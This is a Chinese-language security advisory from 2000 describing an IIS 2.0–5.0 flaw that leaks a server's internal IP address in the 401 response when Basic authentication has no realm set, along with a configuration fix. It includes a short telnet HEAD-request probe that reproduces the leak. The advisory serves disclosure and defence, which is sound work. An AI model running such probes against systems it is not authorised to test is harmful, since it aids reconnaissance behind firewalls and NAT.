首页 -> 安全研究

安全研究

安全漏洞
微软 IIS 内部地址泄漏安全漏洞

发布日期:2000-07-27
更新日期:2000-07-27

受影响系统:

Microsoft IIS 5.0
   + Microsoft Windows NT 2000

Microsoft IIS 4.0
Microsoft IIS 3.0
Microsoft IIS 2.0
   + Microsoft Windows NT 4.0
描述:

当远程用户试图访问一个受保护的区域,这种保护采用的是基本认证方式且没有定义realm时。
IIS会返回一个访问禁止的错误消息,这个消息中包含IIS主机的内部地址。如果IIS在一个防
火墙后面或者采用了地址转换(NAT),就会泄漏内部地址给远程用户。

<* 来源:Dougal Campbell <dougal@GUNTERS.ORG> *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


telnet target 80
Trying target...
Connected to target.
Escape character is '^]'.
HEAD /directory HTTP/1.0[CRLF]
[CRLF]

HTTP/1.1 401 Access Denied
WWW-Authenticate: Basic realm="<Internal IP Address>"
Content-Length: 644
Content-Type: text/html





建议:

在命令行窗口中,cd winnt\system32\inetsrv\adminsamples,执行:
adsutil set w3svc/UseHostName True

缺省这个值是False,不使用HostName


浏览次数:6122
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障